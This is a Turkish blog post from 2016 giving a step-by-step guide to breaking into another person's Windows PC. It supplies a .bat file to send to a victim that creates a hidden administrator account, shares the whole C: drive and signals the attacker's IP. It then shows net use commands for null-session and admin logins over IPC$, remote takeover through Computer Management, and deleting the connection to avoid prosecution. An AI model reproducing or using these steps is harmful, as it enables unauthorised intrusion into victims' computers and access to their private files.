Sayfalar

25 Ağustos 2016 Perşembe

Karşı Tarafın PC'sine Sızma Teknikleri

                            


Not defterini açalım ve aşağıdaki kodları yazıp .bat şeklinde kayıt edelim.

Kod:

[PHP]net start Messenger (net start Messenger komutu çoğu sistemde geçmediği için yazmasanızda olur)
net user By Bouncer /add
net localgroup administrators TurkHackTeam /add
net share system=C: /unlimited
net send [Kendi IP Adresimiz] TurkHackTeam
 [/PHP]

Bu kodları yani .bat şeklinde olan dosyayı karşı tarafa yolladığımız zaman bizi bekleyen bir Administratör hesabımız olacak.

Şimdi sıra geldi hesaba bağlanmaya.


Başlat > Çalıştır > CMD

net view \\Kurbanın IP No


Böylece kurbana IP ile bağlanmaya çalışıyoruz. Eğer PC paylaşıma açıksa bütün bilgi ve belgeleri görebilirsiniz. Değilse PC ’ye null olarak giriş yapacağız. Bunun içinde 139 port’u açmak gerekir.

[PHP]net use \\Kurbanın IP No\\ipc$ /u:"" ""[/PHP]

Bu komutu girdikten sonra " Komut Başarılı " yazacak.

Bunun ardından ilk yazdığım komutu tekrar deneyin ve PC size tüm paylaşımları gösterecek fakat null olarak isimsiz bir şekilde PC ’ye girmiş sayıldığınızdan yapabilecekleriniz sınırlı. Bu nedenle Administratör olarak PC ’ye girmek içinde Administratör şifresini bulmanız gerekli. Şifre bulma yöntemini anlatmıyorum gerek yok çünkü daha önce kurbana yukarıda belittiğim gibi bilgisayarında TurkHackTeam adlı bir Admin oturumu oluşturduk.


Sıra geldi kurbanın bilgisayarına bağlanmaya...

[PHP]net use \\kurbanın ip nosu\\ipc$ /u:"TurkHackTeam" ""[/PHP]

Bu komutla karşı bilgisayara bağlanmış durumdayız "TurkHackTeam" komutundan sonraki "" kısmı şifre girilecek yerdir fakat şifre koyulmadığından boş bırakıyoruz.

"Admin TurkHackTeam" olarak PC ’ye devamlı girmek içinse bir önceki girişinizi silmeniz gerekiyor bunun için:


[PHP]net use \\kurbanın IP nosu\\ipc$ /delete
[/PHP]

Komutunu kullanıyoruz.

Şimdi ise Dos ortamından çıkıp Masaüstün’e bağlanalım.


Başlat/Ayarlar/Denetim Masası/Yönetimsel Araçlar/Bilgisayar Yönetimi

Tıklayarak eylem menüsünden başka bilgisayara bağlan’ı tıkladığınızda karşınıza çıkan pencereye kurbanının ip nosunu yazıp entere basarsanız artık PC nin bütün öğeleri önünüzdedir. Kişi PC yi kullkanırken öbür açtığımız hesaptan masaüstüne müdahale edebilirsiniz kendi PCniz gibi kullanabilirsiniz.
Bilgisayardan çıkarken şunu sakın unutmayın muhakkak girişinizi iptal etmelisiniz.
Yoksa yakayı kaptırırsınız adama sonra uğraşırsınız savcılık falan filan sürünmeyin boşu boşuna bu yüzden tekrar dos ortamına girip:


[PHP]net use \\kurbanın ip nosu\\ipc$ /delete[/PHP]

kodunu yazıyoruz ve işlem tamamdır.

Hiç yorum yok:

Yorum Gönder